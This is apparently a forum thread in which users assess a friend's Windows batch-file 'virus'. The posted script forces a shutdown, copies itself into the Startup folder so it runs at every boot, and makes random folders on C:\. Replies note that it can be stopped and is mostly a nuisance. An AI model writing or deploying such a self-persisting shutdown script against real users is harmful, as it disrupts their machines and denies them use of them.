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Does this work?

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So my friend made a "virus" on notepad, saved it as a .BAT file, but he doesn't know if it would work as he intended.


Here's the code:

shutdown -s -f

MOVE /Y ello.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

@echo off


cd C:\
md %random%

GOTO create


He claims it "[19:57] Phillip K: makes the computer shut down

[19:57] Phillip K: then moves itself into the startup folder

[19:57] Phillip K: then makes useless files in the C:\ drive" and turns off your computer when you turn it on.


So for obvious reasons, we don't wanna test it. Would it work?

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Well 1 its not a virus.

2 if im not mistaken shutdown command gives you time before your computer shuts down. therefor you could counter the shutdown -s -f by opening "Run" and using shutdown -A . rendering it useless. However... if the script made windows auto shutdown it would be a bit of a pain to counter unless your fast with a keyboard and mouse...



In the end... its just annoying.

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Correct me if I'm wrong, but in Windows Vista and Windows 7 creating and moving files into the C:\ directory can't be done without Administrator privileges.

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The -f however forces all currently running programs to close without notifying the user, making any attempts to abort the shutdown process extremely difficult. (This more than likely terminates explorer.exe as well)

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While Viper is right about -f not giving any time to execute, you stop this by simply going into Safemode. And I do believe this won't work as well on Vista or Windows 7 for the admin rights like Ghoztman said. I think it would pop up the "Allow/Disallow" notification. Either way Safemode would still stop it.


I made this in a computer security class a few years ago as an assignment lol

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